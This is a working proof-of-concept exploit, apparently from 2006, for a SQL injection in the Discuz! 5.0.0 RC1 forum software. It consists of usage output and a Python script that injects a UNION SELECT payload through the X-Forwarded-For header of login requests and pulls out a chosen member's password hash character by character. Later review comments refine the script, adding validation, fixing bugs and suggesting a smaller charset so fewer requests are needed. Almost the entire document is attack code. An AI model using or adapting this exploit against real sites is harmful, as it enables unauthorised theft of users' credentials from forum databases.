Discuz! 5.0.0 RC1 SQL injection PoC

DZ 5.0.0 RC1用的人应该很少,因为是一个过渡版本,之后很快就出了RC2,接着又出了正式版。

Usage: G:\tt\dz.py <url> <uid>
Example: G:\tt\dz.py http://127.0.0.1/dz/ 1

G:\tt>dz.py http://target.com 1
Discuz! 5.0.0 RC1 SQL injection exploit
Codz by wofeiwo wofeiwo[0x40]gmail[0x2C]com

[+] Connect target.com
[+] Trying…
[+] Plz wait a long long time…
[+] The uid=1 password hash is:

#!/usr/bin/python
# Discuz! 5.0.0 RC1 SQL injection PoC
# Author: wofeiwo thx superheis help
# Date: Aug 12th 2006

import sys
import httplib
from urlparse import urlparse
from time import sleep

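def injection(lenthofpass, realurl, path, uid=None, charset=None):
    """Recover a Discuz! 5.0.0 RC1 password hash one character at a time.

    Every request sends a ``UNION SELECT`` payload in the ``X-Forwarded-For``
    header of a login POST; the PoC relies on the target splicing that header
    into its SQL statement unescaped.  The payload's ``WHERE`` clause is true
    only when character ``num`` of ``cdb_members.password`` for the given uid
    equals the candidate byte, and the original author's oracle reads the
    outcome off the response body: a body without ``'SELECT'`` is taken to
    mean the injection never reached the database (the script exits via
    ``sys.exit(1)``), a body without ``'ip3'`` means the candidate matched.
    What those two markers correspond to on the server side is not visible
    here.

    Args:
        lenthofpass: number of hash characters to recover (32 for MD5).
        realurl: ``urlparse`` result for the target; element 1 (netloc) is
            the host a plain ``httplib.HTTPConnection`` is opened to.
        path: forum base path ending in ``/``; ``logging.php`` is appended.
        uid: member id to extract; defaults to ``sys.argv[2]`` for backward
            compatibility.  Must be an integer because it is pasted into the
            SQL text verbatim (``ValueError`` otherwise).
        charset: iterable of candidate byte values tried, in order, at each
            position.  Defaults to ``a``-``z`` then ``0``-``9`` as in the
            original; ``[ord(c) for c in '0123456789abcdef']`` is enough for
            a hex digest and needs less than half the requests.

    Writes the recovered characters to stdout as they are found.  If no
    candidate matches at some position (uid absent, hash shorter than
    ``lenthofpass``, character outside ``charset``) a warning is printed and
    the function returns instead of silently skipping the position, which is
    what the original did.
    """
    if uid is None:
        uid = sys.argv[2]
    uid = str(int(uid))  # reject anything that is not a plain integer
    if charset is None:
        charset = list(range(97, 123)) + list(range(48, 58))

    host = realurl[1]
    login = path + 'logging.php?action=login'
    # Canned login form; formhash and the cdb_sid cookie below are fixed
    # copies from the author's session.  NOTE(review): if the target checks
    # formhash the POST may be rejected before the injected statement runs
    # -- confirm against the target version.
    form = ("formhash=6a49b97f&referer=discuz.php&loginmode=&styleid="
            "&cookietime=2592000&loginfield=username&username=test"
            "&password=123456789&questionid=0&answer=&loginsubmit="
            "%E6%8F%90+%C2%A0+%E4%BA%A4")
    base_headers = {
        'Accept': 'image/gif, image/x-xbitmap, image/jpeg, image/pjpeg, application/x-shockwave-flash, application/vnd.ms-excel, application/vnd.ms-powerpoint, application/msword, */*',
        'Referer': 'http://' + host + login,
        'Accept-Language': 'zh-cn',
        'Content-Type': 'application/x-www-form-urlencoded',
        'User-Agent': 'Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; Maxthon)',
        'Connection': 'Keep-Alive',
        'Cache-Control': 'no-cache',
        'Cookie': 'cdb_sid=70KRjS; cdb_cookietime=2592000',
    }

    sys.stdout.write('[+] The uid=' + uid + ' password hash is: ')
    sys.stdout.flush()  # the run takes minutes; show progress even when piped
    for num in range(1, lenthofpass + 1):
        matched = False
        for i in charset:
            payload = ("' union select 122,122,122,122,122,122,122,122 from cdb_members"
                       " where uid=" + uid + " AND ascii(substring(CONCAT(password),"
                       + str(num) + ",1))=" + str(i) + " /*")
            headers = dict(base_headers)
            headers['X-Forwarded-For'] = payload
            body = _post_login(host, login + '&', headers, form)
            if body.find('SELECT') == -1:
                print('[-] Unvalnerable host')
                print('[-] Exit..')
                sys.exit(1)
            if body.find('ip3') == -1:
                sys.stdout.write(chr(i))
                sys.stdout.flush()
                matched = True
                break
        if not matched:
            sys.stdout.write('\n')
            print('[-] No candidate matched at position %d (uid missing, hash '
                  'shorter than %d, or character outside the charset); stopping'
                  % (num, lenthofpass))
            return
    sys.stdout.write('\n')


def _post_login(host, target, headers, form):
    """POST ``form`` to ``http://host`` + ``target`` and return the body.

    One connection per probe, as in the original, but closed in ``finally``
    so non-matching probes (which the original never closed) and failed
    requests do not leak sockets.
    """
    conn = httplib.HTTPConnection(host)
    try:
        conn.request("POST", target, form, headers)
        return conn.getresponse().read()
    finally:
        conn.close()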

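def main():
    """Entry point: ``dz.py <url> <uid>``.

    Prints the banner, validates the two arguments, normalises the forum
    base path and hands off to ``injection``.  Exit status 0 with a usage
    message when the argument count is wrong, 2 when ``<url>`` has no host
    or ``<uid>`` is not an integer (the uid is spliced verbatim into the SQL
    payload, so a non-numeric value can only yield a broken query).
    """
    print('Discuz! 5.0.0 RC1 SQL injection exploit')
    print('Codz by wofeiwo wofeiwo[0x40]gmail[0x2C]com\n')

    if len(sys.argv) != 3:
        print("Usage: %s <url> <uid>" % sys.argv[0])
        print("Example: %s http://127.0.0.1/dz/ 1" % sys.argv[0])
        sys.exit(0)

    url = urlparse(sys.argv[1])
    if not url[1]:
        # Without a scheme urlparse leaves netloc empty and puts everything
        # in the path, so there would be no host to connect to.
        print('[-] <url> must include scheme and host, e.g. http://127.0.0.1/dz/')
        sys.exit(2)
    # injection() opens a plain httplib.HTTPConnection, so only http:// is
    # actually honoured; an https:// URL is still requested over HTTP.

    # The original compared the tuple slice url[2:-1] with '/', which is
    # never equal, so every base path got an extra '/' ('/dz/' -> '/dz//').
    base = url[2] or '/'
    if not base.endswith('/'):
        base += '/'

    try:
        int(sys.argv[2])
    except ValueError:
        print('[-] <uid> must be an integer, got %r' % sys.argv[2])
        sys.exit(2)

    lenth = 32  # the script treats the stored hash as 32 chars (MD5 hex, presumably)
    print('[+] Connect %s' % url[1])
    print('[+] Trying...')
    print('[+] Plz wait a long long time...')

    injection(lenth, url, base)

    print('[+] Finished')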

# Run only when executed as a script, not when imported.
if __name__ == '__main__':
    main()
